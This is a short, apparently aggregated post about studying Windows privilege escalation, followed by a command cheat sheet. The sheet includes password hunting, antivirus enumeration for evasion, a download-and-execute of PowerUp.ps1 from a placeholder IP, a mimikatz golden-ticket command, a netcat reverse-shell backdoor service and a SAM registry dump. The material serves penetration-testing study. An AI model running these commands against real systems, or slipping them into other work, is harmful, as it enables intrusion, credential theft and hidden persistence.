Windows Privilege Escalation Course: Key Enumeration Techniques

By /

Listen to this Post

I decided to go back and continue this course. It doesn’t hurt to watch the videos and take great notes along the way. It will only make me stronger in the end!

👉 This is what I worked on today:

✅ System Enumeration

✅ User Enumeration

✅ Network Enumeration

✅ Password Hunting

✅ AV Enumeration

🎆 Next up, Exploring Automated Tools! 👨‍💻 🤓

You Should Know:

1. System Enumeration Commands

Gather critical system info to identify misconfigurations:

systeminfo 
wmic qfe list brief  Check installed patches 
wmic logicaldisk get name,size,freespace  Disk info 
wmic service list brief  List services

2. User Enumeration

Extract user details and privileges:

whoami /priv 
net user 
net localgroup administrators 
wmic useraccount list full

3. Network Enumeration

Discover network settings and connections:

ipconfig /all 
arp -a 
netstat -ano  Active connections 
route print

4. Password Hunting

Search for passwords in files, registry, or memory:

findstr /si password .txt .xml .ini 
reg query HKLM /f password /t REG_SZ /s

5. AV Enumeration

Identify security software for evasion:

sc query windefend 
tasklist /svc | findstr -i "av|defender"

Automated Tools for PrivEsc

  • WinPEAS: `.\winpeas.exe quiet`
  • PowerUp.ps1:
    IEX(New-Object Net.WebClient).DownloadString("http://<IP>/PowerUp.ps1"); Invoke-AllChecks
  • Seatbelt: `.\Seatbelt.exe -group=all`

What Undercode Say:

Privilege escalation is a critical phase in penetration testing. Mastering manual enumeration (wmic, net, reg) alongside tools like WinPEAS and PowerUp ensures thorough assessment. Always check:
– Unquoted service paths (wmic service get name,pathname)
– Weak registry permissions (reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
– Scheduled tasks (schtasks /query /fo LIST /v)

For persistence, explore Golden Tickets (mimikatz.exe "kerberos::golden") or backdoor services (sc create evilservice binpath= "nc.exe -e cmd.exe <IP> <PORT>").

Expected Output:

A structured report detailing:

  • Missing patches (wmic qfe)
  • Misconfigured services (accesschk.exe)
  • Stored credentials (cmdkey /list)
  • Exportable registry keys (reg save HKLM\SAM sam.bak)

References:

Reported By: Todd Mattran – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: